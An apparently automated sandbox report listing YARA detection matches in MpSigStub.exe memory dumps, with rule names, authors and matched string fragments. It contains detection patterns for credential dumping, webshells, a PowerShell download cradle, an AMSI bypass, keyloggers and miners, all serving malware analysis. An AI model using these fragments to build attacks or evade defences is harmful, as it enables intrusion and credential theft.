Process Memory Space: MpSigStub.exe PID: 4180	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0xb09b5:$dmap01: \\.\PHYSICALDRIVE 0x11700b:$dmap01: \\.\PhysicalDrive 0x173061:$dmap01: \\.\PhysicalDrive 0x173074:$dmap01: \\.\PhysicalDrive 0x25c2a7:$dmap01: \\.\PhysicalDrive 0x2ec29b:$dmap01: \\.\PHYSICALDRIVE 0x3437fe:$dmap01: \\.\PhysicalDrive 0x391add:$dmap01: \\.\Physicaldrive 0x50ef6d:$dmap01: \\.\PHYSICALDRIVE 0x5432fa:$dmap01: \\.\PHYSICALDRIVE 0x65ad50:$dmap01: \\.\PhysicalDrive 0x6c8333:$dmap01: \\.\PhysicalDrive 0x703857:$dmap01: \\.\PhysicalDrive 0x7cd3e8:$dmap01: \\.\PhysicalDrive 0x7cd409:$dmap01: \\.\PhysicalDrive 0x869e56:$dmap01: \\.\PHYSICALDRIVE 0x8863cb:$dmap01: \\.\PHYSICALDRIVE 0x8fc173:$dmap01: \\.\PhysicalDrive 0x960e07:$dmap01: \\.\PHYSICALDRIVE 0xb1a874:$dmap01: \\.\PHYSICALDRIVE 0xb1a8ad:$dmap01: \\.\PHYSICALDRIVE
Process Memory Space: MpSigStub.exe PID: 4180	APT9002Strings	9002 Identifying Strings	Seth Hardy	0x706698:$: %%TEMP%%\%s_p.ax
Process Memory Space: MpSigStub.exe PID: 4180	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x58a170:$cUp: Upload failed! [Remote error code: 0xaf6c9e:$cUp: Upload failed! [Remote error code: 0x58a1b3:$GDGSYDLYR: GDGSYDLYR_%
Process Memory Space: MpSigStub.exe PID: 4180	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x8304c0:$: Neo,welcome to the desert of real.
Process Memory Space: MpSigStub.exe PID: 4180	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3824:$a: NanoCore 0x383a:$a: NanoCore 0x244d50:$a: NanoCore 0x2d4d3c:$a: NanoCore 0x3cf1f7:$a: NanoCore 0x3d222f:$a: NanoCore 0x48e291:$a: NanoCore 0x490ffe:$a: NanoCore 0x541bc3:$a: NanoCore 0x59f095:$a: NanoCore 0x5f2912:$a: NanoCore 0x5f5523:$a: NanoCore 0x5f5568:$a: NanoCore 0x66b41c:$a: NanoCore 0x6e04c3:$a: NanoCore 0x9aa6d8:$a: NanoCore 0xa1508e:$a: NanoCore 0xbab325:$a: NanoCore 0x382d:$b: ClientPlugin 0x3843:$b: ClientPlugin 0x5f5507:$b: ClientPlugin
Process Memory Space: MpSigStub.exe PID: 4180	gh0st	unknown	https://github.com/jackcr/	0x7cf320:$b: Gh0st Update
Process Memory Space: MpSigStub.exe PID: 4180	gholeeV1	unknown	unknown	0x59ceb8:$a: sandbox_avg10_vc9_SP1_2011 0x1afec0:$b: gholee
Process Memory Space: MpSigStub.exe PID: 4180	MW_gholee_v1	http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html	unknown	0x59ceb8:$a: sandbox_avg10_vc9_SP1_2011 0x1afec0:$b: gholee
Process Memory Space: MpSigStub.exe PID: 4180	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0x1df00a:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1d2f1d:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x1df012:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x8f948e:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x4d107:$klg1: [Backspace] 0xbb9404:$klg1: [Backspace] 0x6357b5:$klg2: [Enter] 0x83b1b2:$klg2: [Enter] 0x95730c:$klg2: [Enter] 0xbb940f:$klg2: [Enter] 0x2ccf15:$klg3: [Tab] 0xbb93fe:$klg3: [Tab] 0xbb9416:$klg3: [Tab] 0x2078d5:$klg8: [Home] 0x2078c3:$klg10: [Page Down] 0x2078cf:$klg11: [End] 0x7cfd50:$klg13: [Delete] 0x2f7cf2:$klg15: [Print Screen] 0x6be46c:$klg18: [Alt] 0x2ccf0f:$klg19: [Esc]
Process Memory Space: MpSigStub.exe PID: 4180	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x220419:$stub: StubPath 0x220437:$stub: StubPath 0x79a9fb:$stub: StubPath 0x1d465a:$string1: CONNECT %s:%i HTTP/1.0 0x30b45:$string2: ws2_32 0x30b7f:$string2: ws2_32 0x85d23:$string2: ws2_32 0xcd9bd:$string2: ws2_32 0xe86e4:$string2: ws2_32 0xe86eb:$string2: ws2_32 0x104032:$string2: ws2_32 0x104054:$string2: ws2_32 0x1040a9:$string2: ws2_32 0x1040cb:$string2: ws2_32 0x10411d:$string2: ws2_32 0x10413f:$string2: ws2_32 0x104194:$string2: ws2_32 0x1041b6:$string2: ws2_32 0x15b007:$string2: ws2_32 0x24b755:$string2: ws2_32 0x24b961:$string2: ws2_32
Process Memory Space: MpSigStub.exe PID: 4180	CVE_2018_4878_0day_ITW	unknown	unknown	0xa70b1b:$known1: f:\work\flash\obfuscation\loadswf\src 0xa70b66:$known1: f:\work\flash\obfuscation\loadswf\src 0xa70b1b:$known5: f:\work\flash\obfuscation\loadswf\src 0xa70b66:$known5: f:\work\flash\obfuscation\loadswf\src 0x798025:$header: rdf:RDF 0x4db1f2:$loader1: URLRequest 0x4db1fd:$loader1: URLRequest 0x4db18a:$loader2: URLLoader 0x4db194:$loader2: URLLoader 0xa70af8:$loader3: loadswf 0xa70b09:$loader3: loadswf 0xa70b13:$loader3: loadswf 0xa70b35:$loader3: loadswf 0xa70b43:$loader3: loadswf 0xa70b54:$loader3: loadswf 0xa70b5e:$loader3: loadswf 0xa70b80:$loader3: loadswf 0x12a375:$flash_magic: 5A 57 53 0x12a3a4:$flash_magic: 5A 57 53 0x1cd673:$flash_magic: 5A 57 53 0x1cd69d:$flash_magic: 5A 57 53
Click to see the 579 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
38.3.MpSigStub.exe.138bcf081b6.67.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd31742c.64.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0xe3eb:$s3: hhhhh.exe 0xe3d5:$s4: ttttt.exe 0xe3bf:$s6: cle.log.1
38.3.MpSigStub.exe.138bd21de7c.219.unpack	dump_tool	unknown	@patrickrolsen	0xabcb:$s4: fgdump 0xabd5:$s5: fgexec 0xabd5:$s6: fgexecpipe
38.3.MpSigStub.exe.138bcce2d87.73.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bd21de7c.147.unpack	dump_tool	unknown	@patrickrolsen	0xabcb:$s4: fgdump 0xabd5:$s5: fgexec 0xabd5:$s6: fgexecpipe
38.3.MpSigStub.exe.138bdbb7ebd.124.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x11313:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bd223b1a.220.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
38.3.MpSigStub.exe.138bd223b1a.220.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bea6a936.114.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x19770:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO
38.3.MpSigStub.exe.138bea6a936.114.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x11f0b:$payload_and_input1: eval(request[ 0x8abe:$tagasp_short1: <%\xEF 0x15440:$tagasp_short1: <%@ 0x15465:$tagasp_short1: <%v 0x15463:$tagasp_short2: %> 0x1fe73:$tagasp_short2: %> 0x26d8d:$tagasp_short2: %> 0x2c5ce:$tagasp_short2: %> 0x31f6f:$tagasp_short2: %> 0x15440:$tagasp_long20: <%@pagelanguage="jscript
38.3.MpSigStub.exe.138bea6a936.114.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x11d17:$s1: stratum+tcp://
38.3.MpSigStub.exe.138beac794e.189.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x9f2e:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac794e.189.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x9956:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac794e.189.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x5a35:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x6240:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x6250:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x31147:$hook: C6 06 FF 46 C6 06 25 0x31152:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x32c36:$x3: rimrun.com
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x335b2:$s15: [+] OK! I Closed The Two Socket.
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x32c15:$x4: DropperBackdoor
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x21e5f:$s2: [-]write failed[%d] 0x21e4d:$s3: [-]load failed
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x35441:$s5: emailAddress= 0x35431:$s7: www.naver.com 0x35400:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x353e2:$x3: fjiejffndxklfsdkfjsaadiepwn
38.3.MpSigStub.exe.138be1461b6.106.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdbb68b9.152.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x12917:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
38.3.MpSigStub.exe.138be3e1c0a.122.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x118d3:$payload_and_input1: eval(request. 0x118b6:$tagasp_short1: <%@ 0x118d1:$tagasp_short1: <%e 0x1dcf0:$tagasp_short1: <%\xCF 0x1f546:$tagasp_short1: <%\xE9 0x9aaf:$tagasp_short2: %> 0x118cf:$tagasp_short2: %> 0x118f5:$tagasp_short2: %> 0x1c644:$tagasp_short2: %> 0x2aa31:$tagasp_short2: %> 0x118d1:$tagasp_long13: <%ev 0x118b6:$tagasp_long20: <%@pagelanguage="jscript 0xf5da:$jsp4: public
38.3.MpSigStub.exe.138bdac8e06.63.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0xff09:$a1: logKextPassKey 0xa31b0:$a1: logKextPassKey 0xe0ac:$a4: com_fsb_iokit_logKext 0xff2c:$a4: com_fsb_iokit_logKext 0x61420:$a4: com_fsb_iokit_logKext 0xa31de:$b1: logKext Password: 0xa31f3:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0xff09:$c1: logKextPassKey 0xa31b0:$c1: logKextPassKey
38.3.MpSigStub.exe.138bdac8e06.63.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x968b1:$x11: \\.\mimidrv
38.3.MpSigStub.exe.138bdac8e06.63.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x14c97:$sa1: -ENC 0x4340:$sc2: -noprofile 0x4603:$sc2: -noprofile 0xdd24f:$sc2: -noprofile 0x4352:$sd2: -noninteractive 0x4615:$sd2: -noninteractive 0xdd261:$sd2: -noninteractive 0x13719:$se1: -EP bypass 0x14c7f:$se3: -ExecutionPolicy BypasS
38.3.MpSigStub.exe.138bdac8e06.63.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdac8e06.63.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bcde53e1.182.raw.unpack	XOR_4byte_Key	Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)	Florian Roth	0x14a93:$s1: 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2
38.3.MpSigStub.exe.138bea69132.113.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x1af74:$x10: KIWI_MSV1_0_PRIMARY_CREDENTIALS KO
38.3.MpSigStub.exe.138bea69132.113.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x1370f:$payload_and_input1: eval(request[ 0xa2c2:$tagasp_short1: <%\xEF 0x16c44:$tagasp_short1: <%@ 0x16c69:$tagasp_short1: <%v 0x16c67:$tagasp_short2: %> 0x21677:$tagasp_short2: %> 0x28591:$tagasp_short2: %> 0x2ddd2:$tagasp_short2: %> 0x33773:$tagasp_short2: %> 0x16c44:$tagasp_long20: <%@pagelanguage="jscript
38.3.MpSigStub.exe.138bea69132.113.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1351b:$s1: stratum+tcp://
38.3.MpSigStub.exe.138bdb3329f.123.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bccd231a.71.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bccd231a.71.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bdbb54b5.151.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x13d1b:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x781e:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack	HackTool_Samples	Hacktool	unknown	0x2f19d:$c: Failed to load SAM functions
38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x5723:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be2a02c1.51.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bd1d8af6.146.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.3.MpSigStub.exe.138be2d6086.59.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x75e3:$s1: http:// 0x9606:$s1: http:// 0xb158:$s1: http:// 0xb295:$s1: http:// 0xb2b0:$s1: http:// 0xb2cf:$s1: http:// 0xb2e9:$s1: http:// 0xb307:$s1: http:// 0xb323:$s1: http:// 0xba5e:$s1: http:// 0xba7a:$s1: http:// 0xbaa2:$s1: http:// 0xbaca:$s1: http:// 0xbb02:$s1: http:// 0xbb8d:$s1: http:// 0xf6bb:$s1: http:// 0x11592:$s1: )551{nn 0x115aa:$s1: http:// 0x29863:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
38.3.MpSigStub.exe.138be2d6086.59.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x28bc0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x28a9d:$rat2: rat.(Core).generateBeacon 0x28aba:$rat3: rat.gJitter 0x28ac8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x28b2e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x28b96:$rat8: rat/modules/netsweeper.(Pinger).listen 0x28bc0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x28bee:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x28a74:$winblows: rat/platforms/win.(winblows).GetStage
38.3.MpSigStub.exe.138bcaa73fd.109.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd61fbe2.56.unpack	APT9002Strings	9002 Identifying Strings	Seth Hardy	0xb694:$: %%TEMP%%\%s_p.ax
38.3.MpSigStub.exe.138bce14cd2.18.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x286cb:$s2: system.net.webclient).downloadstring('http
38.3.MpSigStub.exe.138be8f860a.191.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x9702:$s1: stratum+tcp://
38.3.MpSigStub.exe.138be8f860a.191.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be8f860a.191.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be22418a.58.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0xd509:$x1: \Mini rat\
38.3.MpSigStub.exe.138be22418a.58.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0xc78c:$: \Debug\KeyLogger
38.3.MpSigStub.exe.138bd223b1a.210.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
38.3.MpSigStub.exe.138bd223b1a.210.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xb2eb:$s1: http:// 0xb302:$s1: http:// 0xb31a:$s1: http:// 0xb88f:$s1: http:// 0xee24:$s1: lppt>++ 0xee18:$s2: lpptw>++ 0xb2eb:$f1: http:// 0xb302:$f1: http:// 0xb31a:$f1: http:// 0xb88f:$f1: http://
38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0xe7bf:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack	Derusbi_Kernel_Driver_WD_UDFS	Detects Derusbi Kernel Driver	Florian Roth	0xb4e2:$x3: \??\pipe\usbpcex%d 0xb530:$x4: \??\pipe\usbpcg%d
38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xee2f:$xo1: Ik~mhhe+1*4
38.3.MpSigStub.exe.138bdfb53f6.20.unpack	Msfpayloads_msf_10	Metasploit Payloads - file msf.exe	Florian Roth	0x2c26:$s1: 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 0x2c68:$s2: 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4 58 8B 0x2c88:$s3: 01 D0 89 44 24 24 5B 5B 61 59 5A 51 FF E0 5F 5F
38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x74fe:$s1: stratum+tcp://
38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
38.3.MpSigStub.exe.138bdbb68b9.126.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x12917:$e3: exe.rerolpxe
38.3.MpSigStub.exe.138bd4f6df4.69.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x88cb:$s1: stratum+tcp://
38.3.MpSigStub.exe.138bd4f6df4.69.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138beac8d52.188.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x8b2a:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac8d52.188.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x8552:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac8d52.188.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x4631:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x4e3c:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x4e4c:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138bcce283a.74.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bd0ce56a.155.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0xa318:$s1: 7ZSfx%03x.cmd 0x8b5:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1461:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2051:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2c61:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
38.3.MpSigStub.exe.138bda7e4ba.61.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x5dbe:$s1: sekurlsa::msv 0x5e40:$s7: sekurlsa::ssp 0x5dff:$s11: sekurlsa::pth
38.3.MpSigStub.exe.138bdfb53f6.75.unpack	Msfpayloads_msf_10	Metasploit Payloads - file msf.exe	Florian Roth	0x2c26:$s1: 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 0x2c68:$s2: 01 C7 38 E0 75 F6 03 7D F8 3B 7D 24 75 E4 58 8B 0x2c88:$s3: 01 D0 89 44 24 24 5B 5B 61 59 5A 51 FF E0 5F 5F
38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x6bb5:$one3: srvCheckresponded
38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x94e3:$s1: stratum+tcp://
38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bde3d286.171.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138beac794e.117.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x9f2e:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac794e.117.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x9956:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac794e.117.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x5a35:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x6240:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x6250:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x12b81:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x1ce05:$a1: SharPersist.lib 0x1ce19:$a2: SharPersist.exe 0x1ce2d:$b1: ERROR: Invalid hotkey location option given. 0x1ce5e:$b2: ERROR: Invalid hotkey given. 0x1ce7f:$b3: ERROR: Keepass configuration file not found. 0x1ceb0:$b4: ERROR: Keepass configuration file was not found. 0x1cee5:$b5: ERROR: That value already exists in: 0x1cf0e:$b6: ERROR: Failed to delete hidden registry key. 0x1cf3f:$pdb1: \SharPersist\ 0x1cf51:$pdb2: \SharPersist.pdb
38.3.MpSigStub.exe.138bccd231a.165.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bccd231a.165.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bd21de7c.196.unpack	dump_tool	unknown	@patrickrolsen	0xabcb:$s4: fgdump 0xabd5:$s5: fgexec 0xabd5:$s6: fgexecpipe
38.3.MpSigStub.exe.138beac654a.187.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0xb332:$: odhyrfjcnfkdtslt
38.3.MpSigStub.exe.138beac654a.187.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0xad5a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
38.3.MpSigStub.exe.138beac654a.187.raw.unpack	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x6e39:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x7644:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x7654:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
38.3.MpSigStub.exe.138bcce2d87.168.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce283a.167.raw.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
